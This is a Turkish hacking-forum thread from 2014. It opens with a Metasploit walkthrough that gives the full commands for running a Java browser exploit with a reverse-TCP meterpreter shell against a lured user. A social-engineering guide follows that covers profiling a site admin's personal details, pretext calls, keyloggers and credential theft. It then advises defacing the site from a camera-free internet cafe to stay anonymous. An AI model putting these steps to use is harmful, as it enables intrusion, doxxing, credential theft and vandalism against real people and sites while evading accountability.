İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hedef Sisteme Sızma

07-02-2014 17:00
#1
Üyelik tarihi:
07/2013
Mesajlar:
1.413
Teşekkür (Etti):
156
Teşekkür (Aldı):
503
Konular:
229
Ticaret:
(0) %
Merhaba arkadaşlar
Met-asploit framework yani msf 2003 yılında geliştirilmeye başlanmış içinde sistemler hakkında bilgi sahibi olmamızı,sistemlere sızmamızı sağlayan modüller bulunan bir pentest aracıdır.Kullanışlı bir araçtır.
Windows altında kullanılabildiği gibi Linuxtede kullanılabilir.
Benim önerim sanal bilgisayara linux(backtrack veya kali) kurup bu aracı orda kullanmanız yönünde olacaktır.Yavaş yavaş bu konuda bilgi vermeye başlıcam.İçinde bazı modüller var ilk bu modüllerden ve mantığı kavramamıza yardımcı olacak terimlerden bahsedeyim.

Vulnerabilty:Sistemlerde bulunan açıklardır.

Exploit:Sistemdeki açıkları sömüren kod parçacıkları diğer bir değişle açığı suistimal eden yapılardır.


Auxiliary:Hedef sistem hakkında bilgi sahibi olmamızı sağlayan araçlardır.Bu araçların içinde exploitlerde yer alabilmektedir.Exploit kategorisinde yer alan araçlar sisteme uygulandıktan sonra payload çalışmasını sağlarken burdakiler hedef sistemde bilgi toplamak,test yapmak amaçlıdır.Örnek vercek olursak sisteme açıktan bağlanıp şifre denemesi yapan bir exploit bu kategoride yer almaktadır.


Payload:Sistemin exploit edilmesinden sonra sisteme saldıran kişi ile sistem arasında bağlantı kuran,kod çalıştırmasına olanak sağlayan yapılardır.
Payload bölümünde 2 önemli konuya deyinmek istiyorum.İlerde sık sık kullancağınız 2 payload türü olan bind bağlantı ve reverse bağlantı.
Bind Bağlantı hedef sistemin açık portu dinlemeye alıp saldırgan ile iletişim kurmasıdır.

Reverse Bağlantı yani ters bağlantı ise hedef sistemin, bizim(saldırganın) kendi açtığı ve dinlediği porta bağlantı sağlamasıdır.

Saldırdığımız sistemin uzak bir sunucu olduğunu varsayarsak sistemde port açma gibi bir lüksümüz yoksa(çoğu zamanda olmaz) reverse bağlantıyı tercih ederiz.Ama sisteme netcat enjekte edip uygun koşulları sağladığımız takdirde bind bağlantıda yapabiliriz.

Bir diğer önemli konu ise hergün met-asploit framework'ünüzü güncelleyin.Elinizden geldiğince güncel tutmaya çalışın.

Sisteminiz hakkında bilgi edinebilmek ve açıkları tespit edebilmek amacıyla Nessus Adlı Programı Kullanabilirsiniz.
Nessus Kullanımı İçin Tıkla




################################################## ######
Hazırlayan:xMaterdom

Konu:Java Program Exploit Yoluyla Hedef Bilgisayara meterpreter ile sızma
Kullanılan Exploit:exploit/multi/browser/java_jre17_jmxbean_2

Payload:java/meterpreter/reverse_tcp
################################################## ######


Merhaba arkadaşlar.Başlamadan önce şunu belirteyim bu exploit 2013 yılında şubat ayında tespit edilmiştir.Eğer ****sploitiniz güncel değilse bu exploiti bulamayabilirsiniz.Bu yüzden ****sploitinizi güncellemenizi öneririm.



Resimde görüldüğü gibi terminalimizi açtıktan sonra msfconsole yazarak ****sploit framework konsola erişelim.



****sploit framework'u açtığımıza göre artık başlayabiliriz.İlk iş olarak exploitimizi arayalım.****sploitte arama işlemi için search deyimi kullanılır.Bundan sonraya arama kriterleri ve arancaklar yazılır.Resimdeki gibi arama komutumuzu veriyoruz.Enter tuşuna bastığımızda exploitleri görüldüğü üzere listeledi.Resimde seçilmiş olan exploiti kullanacağız.




****sploitte herhangi bir şeyi kullanmak için use deyimi kullanılır.
use exploit/multi/browser/java_jre17_jmxbean_2 şeklinde seçtiğimiz exploitimizi kullanıma alıyoruz.




exploitimizi seçtikten sonra bunun hakkında bilgi edinmek istersek info deyimini kullanırız.
Resimdeki gibi info yazıyoruz.Entere bastığımızda exploit hakkında bilgiler listelenmiş olacaktır.
Burda exploitin adı,modül'ü,Rank'ı(derece),etki edebileceği platform ve hedefleri,açıklaması ve ayarları görülmektedir.Bütün bilgilere erişebilmek için biraz daha aşağı inelim.




Biraz aşağı inince Description kısmında exploit ile ilgili açıklamayı görebilirsiniz.Resimdeki seçilmiş yazıya dikkat edin.Java 7 Update 10'a etki ettiği yazıyor.Dolayısıyla bu exploit Java 6 yüklü bir hedefte çalışmayacaktır.Herhangi bir exploit hakkında bu şekilde detaylı bir bilgi edinmeden o exploiti kullanmamanızı öneririm.Resmi incelediğimizde Required kısmı yes ve no olan ayarlar mevcut.Burdaki required kısmı yes olan ayarlar boş olarak geçilmez.Örneğin URIPATH ayarının required kısmı no.Yani doldurmasakta olur ancak yanındaki açıklamaya baktığımızda eğer bu kısım boş olarak geçilirse rastgele(random) olarak doldurulacağı yazıyor.




Yukardaki info resminde srvport kısmını görebiliyoruz.Burdaki değer 8080 yani exploiti çalıştırcağımızda 8080 portu üzerinden bağlantı geldiğinde payload'ımız aktifleşcek.(bu kısmı anlamamış olabilirsiniz.İlerde anlayacaksınız.)
Herhangi bir özelliğe değer atamak için set deyimi kullanılır.
set srvport 80 ile srvport'a 80 değerini atıyoruz.




http://imageshack.com/a/img841/872/utv4.png
Yukarda URIPATH kısmını doldurmazsak rastgele değer atancağını söylemiştik.
set uripath / ile uripath'e / değerini atıyoruz.(uripath lhost ıp'sinin üzerine eklenen adrestir.İlerde daha rahat anlıcaksınız.)



Sisteme exploiti uyguladıktan sonra sistem ile aramızdaki bağı payloadlar sayesine kurarız.Dolayısıyla exploiti çalıştırmadan önce payload seçmeliyiz.Exploitimize uygun payload'ları listelemek için show payloads deyimini kullanırız.Resimde bu exploitle kullanılabilecek payloadları görüyorsunuz.Seçili olan payload'ı kullanacağız.




set payload java/meterpreter/reverse_tcp komutuyla payload olarak java/meterpreter/reverse_tcp belirliyoruz.(neden reverse derseniz konunun ilk başında bağlantılarla ilgili açıklama mevcut)




Payloadımızı seçtik ancak belli ayarlamalar yapmalıyız.Ayarları görmek için show options deyimi kullanılır.Resimde ayarları görüyorsunuz.Payload options kısmında LHOST değeri mevcut ve bunun herhangi bir değeri yok.Bu kısma kendi ip adresimizi atayacağız.




Terminale ifconfig(windowsta ipconfig) komutunu vererek seçili ip adresini öğrenelim.Daha sonra bu ip adresini kopyalayalım.




set lhost 192.168.142.133 deyimi ile lhost'a 192.168.142.133 değerini atadık.



show options ile ayarlarımıza tekrar baktığımızda yukardaki gibi değerin atandığını görebilirsiniz.



exploit deyimi ile exploit hazır hale getirilir.Yukardaki gibi exploitimizi hazırladık ve çalıştırdık.Şimdi bazı yerlerde anlamadığınız noktalar olabilir ilerde anlıcaksınız demiştim.Burda onları açıklayalım.
4444 numaralı ip adresini dinlemeye aldık(msf kendi aldı bazı exploitlerde almaz siz kendiniz dinlemeye alırsınız.)Local IP kısmının karşısında yer alan değer yani;
http://192.168.142.133:80/ adresine aynı ağımızda bulunan kullanıcıyı yönlendirdiğimizde payloadımız üzerinden bağlantıları alacağız.Yukarda tanımlanan lhost değeri bunun içindi.srvport değeri ise url üzerinden bağlanılcak port.(http default 80dir zaten)
Local olarak bu işlemi uyguladığımızdan srvhost değerini değiştirmedik.
80'in sonunda yer alan / ise bizim uripath değerimiz eğer uripath'e deneme deseydik şu şekil bir çıktı olacaktı.
http://192.168.142.133:80/deneme



Artık yapmamız gereken kullanıcıyı bu adrese yönlendirmek ve meterpreter(payloadımız) aracılığıyla bağlantıyı sağlamak.




windows xp sp3 bilgisayarımdan exploit url'ye bağlanıyorum.



Bağlantı sağlandığında hedef bilgisayara yani windows xp sp3 bilgisayarıma meterpreter ile sızmış bulunuyorum.(Resimdeki gibi)
Meterpreter oturumu başlattı.Artık bu oturumu kullanabiliriz.




Aktif oturumları listelemek için sessions -l deyimi kullanılır.Resimdeki gibi oturumları listeliyoruz.




sessions -i 1 ile 1. oturuma geçiş yapıyorum.Artık meterpreter hazır istediğim komutu çalıştırabilirim.sysinfo ile sistem bilgisini alıyoruz.Resimde görüldüğü gibi hedef sisteme yani windows xp sp3 bilgisayara sızmış bulunmaktayız.


Diğer örneklerde backdoor oluşturma,sniffing,firewall atlatma gibi konulara değineceğim inşallah takipte kalın.Hoşçakalın.

xMaterdom Tarafından Güvenlik Amacıyla Yazılmıştır.(Dökümanlar Eğitim Amaçlıdır)

Makalenin Devamı Alt Tarafta Yer Almaktadır.







Selamun Aleyküm ;
Konuda Sadece Hedef Sisteme Sızma ile ilgili sadece yöntem ve tavsiye vermeyeceğim yanlış gitmekte olan işleyişlerde uyarılarda bulunup nasıl çözüme kavuşturacağız nasıl birşeyler üreteceğiz hep beraber düşünerek tartışacağız.Biraz uzun olabilir yazım lütfen baştan sona kadar okuyup kişisel görüşünüzü belirtin.Emin olun bu makalemi okuduğunuza pişman olmayacaksınız.

Sosyal Mühendislik Yöntemine Geçmeden Önce :

Evet arkadaşlar Sosyal Mühendislik Yöntemi bizim en son kullanacağımız yöntem olmalı.Bu yüzden buna geçmeden önce neler yapabiliriz belirtelim.
Bir hedef sistemimiz var diye kabul edelim. Sitemizde www.HedefSite.com olsun.Bu sitede ilk öncelikle yapacağımız işlemleri kısaca belirteyim ;
* Site hangi dilde kodlandıysa ona göre açıklarına bakıp bug taraması yaparım ( php ise rfi ,sql ise sql gibi xss gibi...)
* Sitede bir bug yoksa Reverse IP Lookup and Domain Check DNS Tool bunun gibi sitelerden serverdaki diğer siteleri görme imkanını sağlarız ve serverdaki diğer sistemlere sızmaya çalışıp oradan hedef sistemimize sıçrama yaparız.
* Bu manuel aramalar sonucunda ele alınır bir sonuç çıkartamazsam programlarla server taraması ve Network taraması yaparım.Önereceğim programlar ;
Shadow Security Scanner(SSS), Acunetix Web Vulnerability Scanner (AWVS) ,GFI LANguard Network Security Scanner,Advanced LAN Scanner ,Advanced Port Scanner,Falcove Web Vulnerability Scanner....

Bunları ayrıntısız olarak anlattım çünkü burada anlatmak isteeceğim kısım SM ile ilgili olanıdır.Bu ve bunun gibi yöntemler sonucunda yine bir gelişme olmayıp hedef sisteme sızamadıysak iş SM ye kalacaktır.
THE_MILLER
SosyaL MühendisLiğe Giriş ;

Sosyal mühendislik ne dersek kesin bir tanımını yapmakta zorlanırım fakat kısaca bir ikna yöntemi diyebilirim.
Az öncede belirttim SM kullanacağımız en son yöntem son çare olmalıdır.Neden dersek bu yöntem uygulayan yani bizim için sakıncalı olabilir hem de Yaptığımız hacking işinin Uslubuna aykırı olur.
Neden aykırı olur bunada geçelim.SosyaL Mühendislik artık okadar basit gibi gözüküyorki herkes ben SM ciyim demekte.SM nin yalan söyleyip dostluk kazanıp kişiye trojen yedirmenin olduğunu sanıyorlar.Aslında asıl hata bizde SM nin tanımını onlara tam olarak anlatamamızdadır.Genelde bir kız msni açıp split camda kız videosu koyup kişi erkekse yakınsal bir tavır sergileyip bunun sonucundada ona bak benim resimlerim bakabilirsin gibi bir yöntem sergilemek sizin SM yöntemlerini kullandığınızı göstermez.SM nin bir veri toplama bu verilere göre fikir üretme aşaması bu fikri uygulamadan önce materyallerin hazırlanma aşaması ve bu senaryoyu uygulamadaki başarısız sonuç karşısında farklı alternatifler üretip halen sonuca gitme aşamaları vardır.Sadece aşamada değildir.SM bir ikna kabileyitidir.Bazılarımızda doğuştan gelen bir yetenek olarak görülebilir.Reel hayatında yaptığı ikna edici konuşmalarıyla vs.Bu herkesde olmayabilir bir çok kişisel gelişim kitapları, kişilerle iletişim , tiyatro gibi etkinliklerle bu geliştirilebilir.

Ben SosyaL Mühendis Değilim ! Ama ........ ? !

Evet Ben Bir Sosyal Mühendis Değilim.İkna kabiliyetim yeterli üst düzey değil.SM adına herşeyi takip etmem.Özel Dersini almadım.Ama Yeri gelince SM yi bu işlerde kullanırım.Sosyal Mühendis değilim Ama sosyaL Mühendisliği Hedef sistem için kullanırım.İkisi çok farklı birşey zaten benim için kullanmak yeterlidir.Peki nasıl kullanırız Web Hacking Yöntemleri ile SM yöntemlerini birleştirerek.İşte ben bunu çok güzel uyguluyorum.bunun içinde Sadece SM bölümünde takılmamızla olmuyor.Web Hacking adında bir birikimimiz olması gereklidir.

Hedef Sistem ve Sistemle İlişkili Kullanıcıların Analizi :

Sm de yapılacak ilk iş analizdir. eX-FaCToRun bugun söylediği bir sözü takıldı aklıma "bu sırtında paraşüt çantasıyla uçaktan atlamak gibi birşey ama paraşütü açmak için çekim ipin yoksa paraşütün olması pek etki etmiyor" Bunu Analiz Yani veri toplamazsak bizim yapacağımız işlevin sonucunda bu olabilir.
Şimdi Ne Tür Veriler Bilgiler gerekli onları belirteyim

1) Hedef Sitenin Admini ( Sahibi ) Hakkında isim,soyad,yaş,msn adresi,ev adresi,Telefon numarası
2) Hosting firmasının iletişim adresi,Telefon nosu,fax,bağlantıları vs
3) Domain bilgileri ( bazen hosting firmasından farklı olabiliyor o yüzden onada bakmak lazım)

Bunların bazılarına whois çekerek ulaşabilmekteyiz.
Esas özellik bunlar ama bunlarla bitmiyor.Hedef kişinin özel bilgileri ,arkadaşları vs sitesinde yönetici varsa onlar hakkındada bilgiler vs.Yani hedef sistemle kimlerin bağlantısı varsa onların hakkında ne kadar bilgi ele geçirebiliyorsak nelere merakı olduğunu,nelere uzak olduğunu ,nelerle uğraştığını ,herşeyini araştırıp rapor etmek bu verileri saklamak gereklidir.Veri araştırması her daim olmalıdır.Diğer aşamalara geçilsede veri eklenerek senaryo duruma göre değiştirilmelidir.

Senaryo Üretimi :

Senaryo üretimi bundan önceki kısım olan veri toplamaya bağlı olarak yapılacak ayrıca Bundan sonraki Materyal hazırlama bölümüylede alakalı olmalıdır.Çünkü elimizde neler var neler kullanabiliriz neler yapabiliriz onları bilmemiz lazım.Senaryo kısmında çok dikkatli ve titiz davranmalıyız çünkü saldırıyı buna göre yön vereceğiz.Hedef kişi nelerden hoşlanıyor nelerden hoşlanmıyor buna göre üretilmelidir.En önemlisi nasıl dikaktini çekeriz bu önemli.Bazen msnini ekleyerek oradan birşeyler elde edilir.Bazen mail yoluyla ama sonuçta bir işlem yapacaksak yazım kuralları dahil herşeyde titiz olmalıyız.Bazense telefon görüşmeleriyle olur.En çok önerdiğim yöntem budur.Kişinin konuşma tipini nasıl bir karakter olduğunu öğrenmenin en mantıklı yoludur.Gidersiniz bir telefon kulubesine ararsınız ya yanlış numara oldu pardon dersiniz.Ya da ben şu firmanın yetkilisiyim vs ile başlarsınız oradan ileitşim maili ve diğer bilgileri kolayca öğrenebilirsiniz.Reel SM her zaman en mantıklısıdır.Neyse ya da bunun gibi bir senaryolar hazırlayıp gerekli materyaller bölümüne geçebiliriz.

Materyalleri Hazırlama :

Evet Diğer aşamalar bitti buna göre bir materyal hazırlamamız gerekecek.Xss ilemi deneyeceğiz ozaman sniffer,Html Logger mi gideceğiz.Kişinin ne tür tarayıcı ve işletim sistemi kullandığına göre bunu ayarlıyacağız.Keyloggermı yedireceğiz ozaman gerekli server tanımsızlaştırma işlevini yapmalıyız.Ya da başka türden akıl oyunlarımı deneyeceğiz clicjacking ya da servera sh3L attırma gibimi ne varsa hazırlayacağız.Bunun içinde son gelişmeleri takip etmeliyiz durmadan yeni yöntemler çıkıp kaybolabiliyor.Mesela bir sitenin yönlendirmesi çıkıp kısa sürede fixleniyor ya da html logger tanınmazken tanınabiliyor gibi.Bu yüzden hazırlayıp senaryoyu sunmadan önce bunları test edip denememiz gerekli.

Senaryo Uygulandıktan Sonraki Durum :

Büyük bir titizlik ve gizlilikle senaryomuzu uyguladık eğer olumlu sonuç aldıysak şimdi reg maili ele geçirmeye geldi.Sonuçta bu adresin şifresi geldiyse hosting firmasına belirterek yönlendiririz.Yada ftp passları varsa direkt index atarız helede plesk panel şifreleri geldiyse Allah deriz
Yani bundan sonraki işlem Siteyi deface etmek fakat kimliğimizi gizli tutmak.güvenlik camerası olmayan internet cafeden kısa süre içerisinde bu işlemi bitirmeliyiz.

Sonuç :

Bir çok konuya değindik.Hedef Sisteme Sızma Yöntemlerini Ağırlıklı olarak SM ile olanı verdik.Gizlilik ve titizliliğin önemini vurguladık.Durumlar karşısında ne tür yollar izleyeceğimizi belirttik.Artık gerisi sizin yaratıcılığınıza kalmış birşey.Birdaha belirtiyorum SM en son kullanılacak yöntemdir.SM işi hafife alınacak bir çocuk oyuncağı değildir.Kişisel gelişiminiz bu yoldaki gelişimlerinizi sağlayacaktır.Hacking Timlerinde Aktif olursanız bu konuda dahada uzman olabilirsiniz.SM seminerleri verilirse mutlaka katılın.

Görüşleriniz ,fikriniz,eksik ya da yanlış belirttiğim bölüm varsa lütfen belirtiniz.Bu makalem min 2-2,5 saatimi aldı sanırım.Umarım faydalı olmuştur.
Konu Héraklés tarafından (15-02-2014 20:32 Saat 20:32 ) değiştirilmiştir.

08-02-2014 18:56
#2
ByDoldis - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2012
Nereden:
/dold.htm
Mesajlar:
1.150
Teşekkür (Etti):
275
Teşekkür (Aldı):
842
Konular:
144
Ticaret:
(0) %
// Konu tarafımca sabite alınmıştır.
Kullanıcı İmzası

Ben geleceği düşünüyorum ve süprizleri hiç sevmem.
0xLegendary, xtornado91 Teşekkür etti.
14-02-2014 22:58
#3
bymaniacz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
Hatay
Mesajlar:
330
Teşekkür (Etti):
21
Teşekkür (Aldı):
14
Konular:
102
Ticaret:
(0) %
sağolasın
16-02-2014 12:35
#4
mehmet t - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2013
Nereden:
nereye....
Yaş:
20
Mesajlar:
633
Teşekkür (Etti):
29
Teşekkür (Aldı):
72
Konular:
59
Ticaret:
(0) %
Teşekkürler ///
Kullanıcı İmzası
T H T




ALPAGU
"Tek Başına Düşmana Saldırıp Yenilmeyen Yiğit"
HER GÜN BİRİNİZİ, BİR GÜN HEPİNİZİ... JÖH-PÖH
22-02-2014 00:05
#5
Üyelik tarihi:
02/2012
Mesajlar:
58
Teşekkür (Etti):
2
Teşekkür (Aldı):
2
Konular:
1
Ticaret:
(0) %
Yararlı konu
Kullanıcı İmzası
Hack bir yaşam tarzıdır.
26-02-2014 06:28
#6
geo - ait Kullanıcı Resmi (Avatar)
geo
Üye
Üyelik tarihi:
02/2014
Nereden:
BURSA
Yaş:
29
Mesajlar:
22
Teşekkür (Etti):
9
Teşekkür (Aldı):
1
Konular:
2
Ticaret:
(0) %
Eline ve emeğine sağlık.
04-06-2014 10:53
#7
Üyelik tarihi:
05/2014
Nereden:
pwd
Mesajlar:
113
Teşekkür (Etti):
122
Teşekkür (Aldı):
31
Konular:
31
Ticaret:
(0) %
Bende Güncel // deyim görmeyenler görsün
Eline Sağlık
Benimde Hep Merak Ediyordum Ya Adamın IP numarasını bulduk.Sonra NMAP ile açık portunu bulduk ya sonra artık M e t a s p l o i t ' i de öğrendik
Kullanıcı İmzası
[B][FONT="Courier New"]
Kaçarak Özgür Olunmaz !
Osman Pamukoğlu

Uyuyan Milletler Ya Ölür Yada Köle Olarak Uyanır !
Kemal Atatürk
04-06-2014 11:19
#8
Üyelik tarihi:
07/2013
Mesajlar:
1.413
Teşekkür (Etti):
156
Teşekkür (Aldı):
503
Konular:
229
Ticaret:
(0) %
Alıntı:
Root DeFaCeR´isimli üyeden Alıntı Mesajı göster
Bende Güncel // deyim görmeyenler görsün
Eline Sağlık
Benimde Hep Merak Ediyordum Ya Adamın IP numarasını bulduk.Sonra NMAP ile açık portunu bulduk ya sonra artık M e t a s p l o i t ' i de öğrendik
Sağolasın met-asploit bu kadarla sınırlı değildir.0'dan met-asploit eğitimi hazırlamayı düşünüyorum ilerleyen zamanlarda.
Root DeFaCeR Teşekkür etti.
04-06-2014 11:49
#9
Oğuz~#> - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2009
Nereden:
Bursa
Yaş:
22
Mesajlar:
4.793
Teşekkür (Etti):
1877
Teşekkür (Aldı):
2498
Konular:
1495
Ticaret:
(0) %
Ellerine sağlık dostum keşke windows sunucular içinde böyle bir anlatım olsa
07-06-2014 21:09
#10
qVp - ait Kullanıcı Resmi (Avatar)
qVp
Üye
Üyelik tarihi:
01/2013
Mesajlar:
15
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
4
Ticaret:
(0) %
ne sistem

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı